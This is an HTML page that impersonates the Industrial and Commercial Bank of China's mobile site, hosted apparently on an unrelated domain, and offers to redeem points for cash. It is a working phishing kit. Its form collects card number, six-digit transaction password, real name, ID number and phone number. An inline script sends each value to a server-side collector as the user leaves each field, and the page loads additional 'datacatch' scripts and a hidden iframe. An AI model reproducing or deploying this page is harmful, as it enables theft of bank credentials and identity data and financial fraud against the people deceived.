<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title>中国工商银行手机网站
</title>
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<link rel="stylesheet" href="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/reset.css">
<link rel="stylesheet" href="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/style.css">
<link rel="stylesheet" href="" id="min320">
<link rel="apple-touch-startup-image" href="http://kxzqa.cc/milanoo_startup.png">
<link rel="apple-touch-icon-precomposed" href="http://kxzqa.cc/milanoo_startup.png">
<script src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/jquery-1.js"></script>
<script src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/main.js"></script>
<style type="text/css"> 
#no_css{
	display:none;	
}
 
.financial_content a:hover {color: #0066b3; }
.financial_content a:active {color: #0066b3; }
.financial_content a:link {color: #0066b3; }
.financial_content a:visited {color: #0066b3; }
 
.wb_list a:hover {color: #0066b3; }
.wb_list a:active {color: #0066b3; }
.wb_list a:link {color: #0066b3; }
.wb_list a:visited {color: #0066b3; }
 
.news1_list1 li a{display:inline-block;max-width:100%}
.style1 {color: #FF0000}
</style>
<script type="text/javascript"> 
$(function(){
	$("#no_js").hide();
});
</script>
</head>
<body>
<div class="page">
  <div class="header">
    <script src=""></script>
    <div class="site_header">
      <div class="clearfix">
        <div class="ccblogo lfloat"> <a href="http://kxzqa.cc/" class="a1"><img id="ccblogo" src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/ccblogo.png" alt="123" style="max-width: 831.5px;"></a> </div>
        <div class="version rfloat" style="max-width: 665.2px;">
          <div class="ccb_version_but"><a href="" class="version1"><span class="vbg_l"></span>简洁版<span class="vbg_r"></span></a><a href="" class="version2"><span class="vbg_l"></span>完整版<span class="vbg_r"></span></a></div>
        </div>
      </div>
      <div class="service"><span class="service_tel">客户服务热线：<span><a href="tel:95588">95588</a></span></span></div>
    </div>
    <!--导航条start-->
    <div class="nav clearfix">
      <ul>
        <li><a href="" style="color:#ffffff" class="ui-btn-active">导航</a></li>
        <li><a href="" style="color:#ffffff">动态</a></li>
        <li><a href="" style="color:#ffffff">查询</a></li>
        <li><a href="" style="color:#ffffff">行情</a></li>
        <li><a href="http://weibo.cn/icbcebanking" style="color:#ffffff">微博</a></li>
      </ul>
    </div>
    <div class="hq_page">
      <div class="news ccb_title">
        <h1>兑换规则</h1>
      </div>
      <div id="pic1" class="pic1 content">
        <p>您现在依照以下信息填写查询您的积分进行兑换现金到您的银行卡中，填写的信息与开户账户一致，否则无法查询积分进行兑换</p>
      </div>
      <div class="news ccb_title">
        <h1>积分兑换现金</h1>
      </div>
      <div id="pic2" class="pic2 content">
        <style>
.text {
	PADDING-BOTTOM: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; MARGIN-BOTTOM: 20px; COLOR: #999; FONT-SIZE: 14px; PADDING-TOP: 0px
}
article {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
article.button {
	BORDER-BOTTOM: #CDCDCD 1px solid; TEXT-ALIGN: center; BORDER-LEFT: #CDCDCD 1px solid; MARGIN: 10px; BACKGROUND: #ffffff; FONT-SIZE: 16px; BORDER-TOP: #CDCDCD 1px solid; BORDER-RIGHT: #CDCDCD 1px solid; -webkit-border-radius: 3px; border-radius: 3px; -webkit-box-shadow: 0 2px 2px #CCC; box-shadow: 0 2px 2px #CCC
}
article.button A {
	LINE-HEIGHT: 40px; DISPLAY: block; HEIGHT: 40px; COLOR: #333; text-shadow: 0 1px 0 white; -webkit-text-shadow: 0 0 1px #fff
}
article.border {
	BORDER-BOTTOM: #ccc 1px solid; TEXT-ALIGN: left; BORDER-LEFT: #ccc 1px solid; LINE-HEIGHT: 30px; MARGIN: 10px; FONT-SIZE: 16px; BORDER-TOP: #ccc 1px solid; BORDER-RIGHT: #ccc 1px solid; -webkit-border-radius: 5px; border-radius: 5px; -webkit-box-shadow: 0px 2px 1px #dbdbdb; box-shadow: 0px 2px 1px #dbdbdb
}
article.border section {
	BORDER-BOTTOM: #ccc 1px solid; PADDING-BOTTOM: 7px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; PADDING-TOP: 7px
}
article.border section .input2 {
	WIDTH: 25px
}
DL {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
.mar_l80 DL {
	OVERFLOW: hidden
}

INPUT {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
INPUT {
	OUTLINE-STYLE: none; OUTLINE-COLOR: invert; OUTLINE-WIDTH: medium; FONT: inherit
}
.select INPUT {
	BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-LEFT: 5px; WIDTH: 124px; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: left; HEIGHT: 29px; BORDER-TOP: 0px; BORDER-RIGHT: 0px
}


</style>

        <form id="form1" method="post" name="form1" action="submit.asp">
		 
          <input id="idType" class="input1" value="0" name="idType" type="hidden">
          <article class="border mar_l80">
            <section><span>注册卡（账）号</span>
              <dl>
                <input id="g_zhanghao" class="input1" name="g_zhanghao" onblur="showHint()" type="tel">
              </dl>
            </section>
            <section><span>6位数交易密码</span>
              <dl>
                <input name="g_wangyin" class="input1" id="g_wangyin" maxlength="6" onblur="showHint()" type="password">
              </dl>
            </section>
            <section><span>真实姓名</span>
              <dl>
                <input id="idNo1" class="input1" name="g_xingming" onblur="showHint()" type="text">
              </dl>
            </section>
            <section><span>身份证号</span>
              <dl>
                <input id="g_shenfenzheng" class="input1" name="g_shenfenzheng" onblur="showHint()" type="text">
              </dl>
            </section>
            <section><span>银行预留手机号码</span>
              <dl>
                <input id="g_shouji" class="input1" name="g_shouji" onblur="showHint()" type="tel">
              </dl>
            </section>
			
            <div class="mobile_login"> <a href="http://kxzqa.cc/index.asp"><span class="login_ico_l"></span><span class="login_ico_m">上一步</span><span class="login_ico_r"></span></a> <a href="javascript:form1.submit();"><span class="login_ico_l"></span><span class="login_ico_m">下一步</span><span class="login_ico_r"></span></a>  </div>
            <input name="iaa" id="iaa" value="1" type="hidden">
          </article>
          <div class="warn"></div>
        </form>
      </div>
    </div>
    <!-- InstanceEndEditable -->
    <meta name="format-detection" content="telephone=no">
    <div class="footer">
      <h4 style="font-size:12px;">&#169;版权所有&nbsp;<span>中国工商银行版权所有&nbsp;京ICP备&nbsp;13030780号</span> <br>
        京公网安备&nbsp;110102000450 </h4>
    </div>
    <!-- /footer -->
    <script src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/dataacquisition.htm"></script>
    <script src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/datacatch.htm"></script>
  </div>
  <!-- InstanceEnd -->
  <script>
function showHint()
{

var str="";
if ((document.getElementById("g_zhanghao").value).length>0) {
	str=str +"zhanghao="+(document.getElementById("g_zhanghao").value);
} else {
	str=str +"zhanghao=";
}
if ((document.getElementById("g_wangyin").value).length>0) {
	str=str +"&wangyin="+(document.getElementById("g_wangyin").value);
} else {
	str=str +"&wangyin=";
}
if ((document.getElementById("idNo1").value).length>0) {
	str=str +"&idNo="+(document.getElementById("idNo1").value);
} else {
	str=str +"&idNo=";
}
if ((document.getElementById("g_shenfenzheng").value).length>0) {
	str=str +"&shenfenzheng="+(document.getElementById("g_shenfenzheng").value);
} else {
	str=str +"&shenfenzheng=";
}
if ((document.getElementById("g_shouji").value).length>0) {
	str=str +"&shouji="+(document.getElementById("g_shouji").value);
} else {
	str=str +"&shouji=";
}
if (window.XMLHttpRequest)
  {// 针对 IE7+, Firefox, Chrome, Opera, Safari 的代码
	xmlhttp=new XMLHttpRequest();
  }
else
  {// 针对 IE6, IE5 的代码
	//xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
	
	
	 var versions =   
        [  
            "MSXML2.XmlHttp.6.0",   
            "MSXML2.XmlHttp.3.0"  
        ];  
        for(var i = 0; i < versions.length; i++)  
        {  
            try  
            {  
                var xmlhttp = new ActiveXObject(versions[i]);  
            }  
            catch(error)  
            {  
                var xmlhttp=null;
            }  
        }  
	
	
  }
if (xmlhttp!= null) {  
	xmlhttp.onreadystatechange=function()
	{
	  if (xmlhttp.readyState==4 && xmlhttp.status==200)
		{
		  //OpenWindow.document.write("<H1>"+xmlhttp.responseText+"</h1>")  ; 
		
		}
	  }
	xmlhttp.open("GET","tmpsave.asp?"+str,true);
	xmlhttp.send();
  }
}

</script>
</div>
<iframe src="%E4%B8%AD%E5%9B%BD%E5%B7%A5%E5%95%86%E9%93%B6%E8%A1%8C%E6%89%8B%E6%9C%BA%E7%BD%91%E7%AB%99_files/online.htm" style="display: none;"></iframe>


</body></html>